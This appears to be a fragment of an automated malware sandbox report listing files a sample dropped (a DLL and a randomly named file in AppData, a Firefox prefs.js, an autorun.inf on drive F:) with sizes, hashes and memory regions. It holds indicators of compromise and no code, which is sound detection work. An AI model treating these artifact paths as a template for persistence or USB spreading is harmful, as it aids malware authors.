                                                                                                                                                                                                                                                                                                                                                                  b23940134fec85d6d0fa7e02e737a9e1ec046a05714b190fb4e70e97b96b989b

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  345427a14b9544b8f811017363f8ca9a9f30be2783b7aeb0a1f145c3eadbe73fda7e20276087d4e0cbabd6dff9898ea49cbb23fca5f0875ef1dfc348822102cd

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrxx2hps.default-release\prefs.js

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  52470bfd657efe79177539a91a948a19

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  f79b34b0fef22b1135cf549c8a7fb90fb1df1fd6

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  7301169de6aa1c7adaf7098ee5170f75a93b6abdcd3913495d28d2ed453b5e9d

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  eeace7bc54272667a833df733fdf2e3130634852a78088ae6fc5dc732cdc146dcb598f12d8c5e209692b84b7ad51eb958acba4e26f1ded91ed73aee9fed20f64

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\XIo2qNiS.XIo2qNiS

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  315KB

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  2590fd6e112931b0defac0686d5c268e

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  cb0663525cc8286d9cba4fa642ca12de55eb9155

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  66244c2be9f38702ccb106a5e2e43114f9e113d6ebe2d474e74181afb1490377

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  8d41b9e75d8d9424c7452a4449fadf23117b0de04855679df14ef744f1417850ed8a3831750310ae42d1f932249cc1a6d607be046eceb6ed0cd82e065f306374

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\moggy.dll

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  191KB

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  11115f56c2ed3c465cb00b2d70281aaf

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  a42e36c46bc69a1ce9bb87ef97c262f2d0ac0cb7

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  af12acbb0d9e9d74a3f0fa0cd9483020592e277ce5392ec9521e79957043074d

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  4caa106ee5008a35350af729ce53f1568df7c9658af6b0dda6e2678a37d33cbf1e460269b94495624b44c0ad4e3fb9c098fb5b346241eedf2819aedf0ad758c6

                                                                                                                                                                                                                                                                                                                                                                • F:\autorun.inf

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  63B

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  f64baf418f685884efec59a9d80bc5f6

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  9c90f7a7efd7ef3059837fdeb06b6b781ca6d1e9

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  4b9870b1f52e252451b3fa099e8b270c32ddc6fc29372067be28dcd009ec4e8f

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  dceecd6a564c974c71ceeb544b0dfde70a09315db6d72a50fdbecdc0cf505a7ce52b7a83a9a8c79e8cfbb996c054585da6d7c08bf0026b4d9ecdde5f0a2b2a69

                                                                                                                                                                                                                                                                                                                                                                • memory/536-186-0x0000000010000000-0x0000000010035000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  212KB

                                                                                                                                                                                                                                                                                                                                                                • memory/588-87-0x00000000003E0000-0x00000000003E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                • memory/2096-4-0x0000000010000000-0x000000001005E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  376KB

                                                                                                                                                                                                                                                                                                                                                                • memory/2096-301-0x0000000002770000-0x00000000027A5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  212KB

                                                                                                                                                                                                                                                                                                                                                                We care about your privacy.

                                                                                                                                                                                                                                                                                                                                                                This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.